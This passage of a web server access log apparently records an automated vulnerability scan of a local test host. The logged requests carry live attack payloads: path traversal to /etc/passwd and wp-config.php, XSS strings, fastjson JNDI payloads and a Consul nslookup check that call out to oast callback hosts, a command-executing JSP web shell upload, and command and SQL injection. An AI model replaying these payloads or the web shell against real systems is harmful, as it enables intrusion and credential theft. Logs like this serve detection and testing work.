+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sysmgmt/2015/bmc/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/297MbDxkt9MODTRJD23DgNV9f5U/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:registerGuest\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22name\x5C\x22:\x5C\x22cve-2020-nuclei\x5C\x22,\x5C\x22email\x5C\x22:\x5C\x22cve@nuclei.local\x5C\x22}],\x5C\x22id\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.208","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:loadHistory\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22rid\x5C\x22:\x5C\x22GENERAL\x5C\x22}],\x5C\x22msg\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration.php-dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"{\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8hn0smpv8c57g0t004tp84qei6mtqc.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8hn0smpv8c57g0t00yoncc7cmwpmgw.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"{\x0D\x0A \x22ID\x22: \x22297MdqIK09gh7W0VRZWefASI8x3\x22,\x0D\x0A \x22Name\x22: \x22297MdqIK09gh7W0VRZWefASI8x3\x22,\x0D\x0A \x22Address\x22: \x22127.0.0.1\x22,\x0D\x0A \x22Port\x22: 80,\x0D\x0A \x22check\x22: {\x0D\x0A \x22script\x22: \x22nslookup c9v8hs0smpv8c6ag07h0ad7ugezk1n3my.oast.online\x22,\x0D\x0A \x22interval\x22: \x2210s\x22,\x0D\x0A \x22Timeout\x22: \x2286400s\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/agent/service/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.003","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV\x0D\x0AOPTION=S3WYOSWLBSGr\x0D\x0AcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\x0D\x0A= WUghPB3szB3Xwg66 the CREATEDATE\x0D\x0ArecordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6\x0D\x0AoriginalFileId = wV66\x0D\x0AoriginalCreateDate = wUghPB3szB3Xwg66\x0D\x0AFILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs\x0D\x0AneedReadFile = yRWZdAS6\x0D\x0AoriginalCreateDate IZ = 66 = = wLSGP4oEzLKAz4\x0D\x0A<%@ page language=\x22java\x22 import=\x22java.util.*,java.io.*\x22 pageEncoding=\x22UTF-8\x22%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\x22\x5Cn\x22);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\x22x\x22.equals(request.getParameter(\x22pwd\x22))&&!\x22\x22.equals(request.getParameter(\x22297MbDq9l1cHTcERv2PDKuVItHp\x22))){out.println(\x22
\x22 +excuteCmd(request.getParameter(\x22297MbDq9l1cHTcERv2PDKuVItHp\x22)) + \x22
\x22);}else{out.println(\x22:-)\x22);}%>6e4f045d4b8506bf492ada7e3390d7ce","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seeyon/htmlofficeservlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:72:\x220,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\x22;s:2:\x22id\x22;i:1;}", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/test123456.jsp?pwd=asasd3344&297MbDq9l1cHTcERv2PDKuVItHp=ipconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"297MbDqegoxdM0EB0bpNmnloc8z","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com 